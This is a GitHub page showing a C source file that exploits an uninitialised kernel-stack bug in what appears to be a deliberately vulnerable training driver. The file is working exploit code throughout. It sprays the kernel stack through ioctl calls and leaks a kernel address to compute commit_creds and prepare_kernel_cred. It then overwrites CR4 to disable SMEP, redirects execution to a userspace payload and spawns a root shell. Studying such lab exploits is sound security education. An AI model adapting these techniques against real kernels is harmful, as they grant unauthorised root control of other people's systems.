Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
156 lines (112 sloc) 2.92 KB
#define _GNU_SOURCE
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <pthread.h>
#include "common.h"
#include "../src/vuln_driver.h"
#define NUM_THREADS 3000
int fd;
typedef struct stack_obj
{
int do_callback;
long fn_arg;
void (*fn)(long) ;
}stack_obj;
typedef struct use_obj_args
{
int option;
long fn_arg;
}use_obj_args;
void *do_ioctl(void *arg)
{
char *buff = (char *)arg;
ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
}
void stack_spray(char *buff)
{
pthread_t threads[NUM_THREADS];
for(int i = 0; i < NUM_THREADS; i++)
{
pthread_create(&threads[i], NULL, &do_ioctl, (void *)buff);
}
for(int i = 0; i < NUM_THREADS; i++)
{
pthread_join(threads[i], NULL);
}
}
void do_page_fault()
{
use_obj_args use_obj = {
.option = 1,
.fn_arg = 1337,
};
int child_fd = open(PATH, O_RDWR);
//trigger a pagefault trying to call fn()->0
ioctl(child_fd, UNINITIALISED_STACK_USE, &use_obj);
}
int main(void)
{
force_single_core();
fd = open("/dev/vulnerable_device", O_RDWR);
void *addr = NULL;
if(map_and_copy(addr) == -1)
{
printf("[x] Error mapping address [x]\n");
exit(-1);
}
char buff[4096];
memset(buff, 0x00, sizeof(buff));
use_obj_args use_obj = {
.option = 1,
.fn_arg = 1337,
};
pid_t pid = fork();
if(pid == 0)
do_page_fault();
wait(NULL);
long leak = get_info_leak();
long native_cr4_write = leak - CR4_WRITE_OFFSET;
commit_creds = leak - COMMIT_CREDS_OFFSET;
prepare_kernel_cred = leak - PREPARE_CRED_OFFSET;
long target_cr4 = TARGET_CR4;
printf("[+] Leaked address %p calculating offsets:\n\tnative_write_cr4: %p\n\tprepare_kernel_cred: %p\n\tcommit_creds: %p\n\t\n",
(void *)leak,(void *) native_cr4_write, (void *)prepare_kernel_cred, (void *)commit_creds );
size_t long_size = sizeof(long);
/* Spray the stack space with our target function and its argument */
for(int i =0; i < 4096; i += long_size*2)
{
memcpy(buff+i, &target_cr4, long_size);
memcpy(buff+i+long_size, &native_cr4_write, long_size);
}
/* Allocate our buffer on the kernel stack, and then trigger the vuln */
ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
ioctl(fd, UNINITIALISED_STACK_USE, &use_obj);
/* At this point SMEP is disabled */
memset(buff, 0, sizeof(buff));
long target_address = MMAP_ADDR;
/* Spray the stack space with our userspace address */
for(int i =0; i < 4096; i += long_size)
{
memcpy(buff+i, &target_address, long_size);
}
/* Allocate our buffer on the kernel stack and trigger the vuln */
ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
ioctl(fd, UNINITIALISED_STACK_USE, &use_obj);
if(getuid() == 0)
{
printf("[!!!] Popping root shell [!!!]\n");
system("/bin/sh");
}
close(fd);
munmap(addr, MAP_SIZE);
}
You can’t perform that action at this time.